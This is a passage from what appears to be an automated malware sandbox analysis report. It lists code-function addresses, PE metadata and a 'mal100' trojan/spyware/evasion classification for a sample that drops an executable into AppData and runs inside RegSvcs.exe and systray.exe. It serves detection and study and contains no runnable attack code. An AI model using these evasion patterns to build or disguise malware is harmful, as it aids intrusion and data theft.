                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01715BF010_2_01715BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016DDBF910_2_016DDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BFB8010_2_016BFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01713A6C10_2_01713A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01757A4610_2_01757A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175FA4910_2_0175FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174DAC610_2_0174DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016E5AA010_2_016E5AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01741AA310_2_01741AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173DAAC10_2_0173DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01757D7310_2_01757D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A3D4010_2_016A3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01751D5A10_2_01751D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BFDC010_2_016BFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01719C3210_2_01719C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175FCF210_2_0175FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175FF0910_2_0175FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01663FD510_2_01663FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01663FD210_2_01663FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175FFB110_2_0175FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A1F9210_2_016A1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A9EB010_2_016A9EB0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_016425E111_2_016425E1
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_016413F011_2_016413F0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_01649B6C11_2_01649B6C
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_01641B6A11_2_01641B6A
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_01649CF011_2_01649CF0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_0164203011_2_01642030
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_0164A25911_2_0164A259
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_0164A29011_2_0164A290
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_0164087111_2_01640871
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_0164136611_2_01641366
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_016455E811_2_016455E8
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_016455DA11_2_016455DA
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_0164344111_2_01643441
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_016457E011_2_016457E0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_016457F011_2_016457F0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_016439CC11_2_016439CC
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_01645A6811_2_01645A68
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_01645A5911_2_01645A59
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_01649CE011_2_01649CE0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_057B2C0011_2_057B2C00
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_07FAC40011_2_07FAC400
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_07FAC3F011_2_07FAC3F0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_07FAA20011_2_07FAA200
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_07FA9DB911_2_07FA9DB9
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_07FABA5011_2_07FABA50
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_07FA998311_2_07FA9983
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0197010017_2_01970100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019C600017_2_019C6000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01A002C017_2_01A002C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0198053517_2_01980535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0197C7C017_2_0197C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019A475017_2_019A4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0198077017_2_01980770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0199C6E017_2_0199C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019829A017_2_019829A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0199696217_2_01996962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019B889017_2_019B8890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019668B817_2_019668B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019AE8F017_2_019AE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0198A84017_2_0198A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0198284017_2_01982840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0197EA8017_2_0197EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01998DBF17_2_01998DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01988DC017_2_01988DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0197ADE017_2_0197ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0198AD0017_2_0198AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0198ED7A17_2_0198ED7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01970CF217_2_01970CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01980C0017_2_01980C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019FEFA017_2_019FEFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01972FC817_2_01972FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019A0F3017_2_019A0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019C2F2817_2_019C2F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019F4F4017_2_019F4F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01992E9017_2_01992E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01980E5917_2_01980E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0198B1B017_2_0198B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0196F17217_2_0196F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019B516C17_2_019B516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019833F317_2_019833F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0196D34C17_2_0196D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019852A017_2_019852A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0199B2C017_2_0199B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0199D2F017_2_0199D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0198349717_2_01983497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019C74E017_2_019C74E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0197146017_2_01971460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0198B73017_2_0198B730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0198599017_2_01985990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0198995017_2_01989950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0199B95017_2_0199B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019838E017_2_019838E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019ED80017_2_019ED800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0199FB8017_2_0199FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019BDBF917_2_019BDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019F5BF017_2_019F5BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019F3A6C17_2_019F3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0199FDC017_2_0199FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01983D4017_2_01983D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019F9C3217_2_019F9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01999C2017_2_01999C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01981F9217_2_01981F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01989EB017_2_01989EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0042EDF317_2_0042EDF3
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B8E4F619_2_04B8E4F6
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9244619_2_04B92446
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04BA059119_2_04BA0591
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE053519_2_04AE0535
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AFC6E019_2_04AFC6E0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04ADC7C019_2_04ADC7C0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE077019_2_04AE0770
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B0475019_2_04B04750
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B7200019_2_04B72000
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04BA01AA19_2_04BA01AA
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B981CC19_2_04B981CC
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AD010019_2_04AD0100
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B7A11819_2_04B7A118
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B6815819_2_04B68158
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B602C019_2_04B602C0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B8027419_2_04B80274
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04BA03E619_2_04BA03E6
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AEE3F019_2_04AEE3F0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9A35219_2_04B9A352
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B80CB519_2_04B80CB5
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AD0CF219_2_04AD0CF2
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE0C0019_2_04AE0C00
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AF8DBF19_2_04AF8DBF
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04ADADE019_2_04ADADE0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AEAD0019_2_04AEAD00
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9CE9319_2_04B9CE93
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AF2E9019_2_04AF2E90
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9EEDB19_2_04B9EEDB
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9EE2619_2_04B9EE26
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE0E5919_2_04AE0E59
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B5EFA019_2_04B5EFA0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AECFE019_2_04AECFE0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AD2FC819_2_04AD2FC8
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B00F3019_2_04B00F30
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B22F2819_2_04B22F28
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B54F4019_2_04B54F40
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AC68B819_2_04AC68B8
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B0E8F019_2_04B0E8F0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE284019_2_04AE2840
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AEA84019_2_04AEA840
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE29A019_2_04AE29A0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04BAA9A619_2_04BAA9A6
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AF696219_2_04AF6962
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04ADEA8019_2_04ADEA80
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B96BD719_2_04B96BD7
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9AB4019_2_04B9AB40
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9F43F19_2_04B9F43F
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AD146019_2_04AD1460
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B7D5B019_2_04B7D5B0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9757119_2_04B97571
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B916CC19_2_04B916CC
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9F7B019_2_04B9F7B0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B970E919_2_04B970E9
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9F0E019_2_04B9F0E0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE70C019_2_04AE70C0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B8F0CC19_2_04B8F0CC
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AEB1B019_2_04AEB1B0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04BAB16B19_2_04BAB16B
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B1516C19_2_04B1516C
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04ACF17219_2_04ACF172
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE52A019_2_04AE52A0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B812ED19_2_04B812ED
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AFB2C019_2_04AFB2C0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B2739A19_2_04B2739A
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9132D19_2_04B9132D
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04ACD34C19_2_04ACD34C
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9FCF219_2_04B9FCF2
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B59C3219_2_04B59C32
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AFFDC019_2_04AFFDC0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B97D7319_2_04B97D73
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B91D5A19_2_04B91D5A
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE3D4019_2_04AE3D40
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE9EB019_2_04AE9EB0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9FFB119_2_04B9FFB1
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE1F9219_2_04AE1F92
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9FF0919_2_04B9FF09
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE38E019_2_04AE38E0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B4D80019_2_04B4D800
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AE995019_2_04AE9950
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AFB95019_2_04AFB950
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B25AA019_2_04B25AA0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B7DAAC19_2_04B7DAAC
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B8DAC619_2_04B8DAC6
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B53A6C19_2_04B53A6C
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9FA4919_2_04B9FA49
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B97A4619_2_04B97A46
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AFFB8019_2_04AFFB80
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B55BF019_2_04B55BF0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B1DBF919_2_04B1DBF9
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B9FB7619_2_04B9FB76
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00AC1E6019_2_00AC1E60
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00ABB0A919_2_00ABB0A9
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00ABB06019_2_00ABB060
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00ABB05419_2_00ABB054
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00AB11A319_2_00AB11A3
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00AC552019_2_00AC5520
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00AC370B19_2_00AC370B
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00AC371019_2_00AC3710
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00ADBC4019_2_00ADBC40
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00ABCD1019_2_00ABCD10
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00ABCF3019_2_00ABCF30
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00ABAF1019_2_00ABAF10
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_048EE4AC19_2_048EE4AC
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_048EE6DD19_2_048EE6DD
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_048ED7A819_2_048ED7A8
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_048EE22819_2_048EE228
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_048EE34319_2_048EE343
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_048EE86C19_2_048EE86C
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_048ECA6819_2_048ECA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 019C7E54 appears 97 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0171F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 016D5130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 019EEA12 appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0170EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 016E7E54 appears 111 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0168B970 appears 280 times
                Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04B27E54 appears 99 times
                Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04B4EA12 appears 86 times
                Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04ACB970 appears 273 times
                Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04B15130 appears 37 times
                Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04B5F290 appears 105 times
                Source: MN1qo2qaJmEvXDP.exeStatic PE information: invalid certificate
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2420596880.0000000003E49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2414232907.00000000009BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2420596880.0000000003E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2436656014.0000000008FB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2436142319.0000000007500000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2418207809.00000000026FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000000.2310144765.000000000032C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCvjBo.exe: vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exeBinary or memory string: OriginalFilenameCvjBo.exe: vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: MN1qo2qaJmEvXDP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: rlJvZXSinaRi.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, GEBJEhGjieg361Vr8V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, GEBJEhGjieg361Vr8V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, GEBJEhGjieg361Vr8V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/14@12/10
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeFile created: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
